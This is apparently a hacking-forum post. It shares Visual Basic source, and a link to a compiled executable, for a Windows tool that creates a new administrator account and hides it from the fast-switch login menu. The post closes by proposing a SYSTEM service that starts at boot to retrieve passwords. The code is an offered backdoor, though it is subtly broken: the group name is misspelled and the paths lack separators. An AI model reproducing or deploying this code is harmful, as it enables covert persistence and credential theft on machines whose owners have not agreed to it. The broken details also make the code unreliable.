Heres a patch code that will add a new username + password, but will ask you for the creds, then it will delete the new admin from the user list, so that it is not visible from the fast-switch menu... Then it will open cmd prompt, not sure what good that will do. I have provided a compiled version of the VB code here: http://www.rrko.com/dev/AddUser.exe
Module HakXP
Sub Main()
Console.Write("Enter new username: ")
Dim uName As String = Console.ReadLine()
Console.Write("Enter password for " + uName + " : ")
Dim pWord As String = Console.ReadLine()
AddUser(uName, pWord)
RunProcess("C:WINDOWSsystem32", "cmd.exe") 'Will open up a cmd prompt at C:WINDOWSsystem32
End Sub
Sub AddUser(ByVal UserName As String, ByVal Password As String)
Shell("net user " + UserName + " " + Password + " /add") 'Adds the user "UserName" with password "Password"
Shell("net localgroup administators " + UserName + " /add") 'Adds "UserName" to the admin group
Shell("net localgroup users " + UserName + " /delete") 'If Fast-Switching is on, then "UserName" will show up
End Sub
Sub RunProcess(ByVal Path As String, ByVal Exe As String)
Dim px As New Process
px.StartInfo.WorkingDirectory = Path
px.StartInfo.FileName = Exe
px.Start()
End Sub
End Module
Another possible approach...
If you were to make a new windows process and create it under the SYSTEM account and set it to automatic, it would automaticly start at load, no matter who was logged in. This good be a possible way to retreive passwords? I'm working on it, have all the code, just need some filler code for the hack
--ShadowHax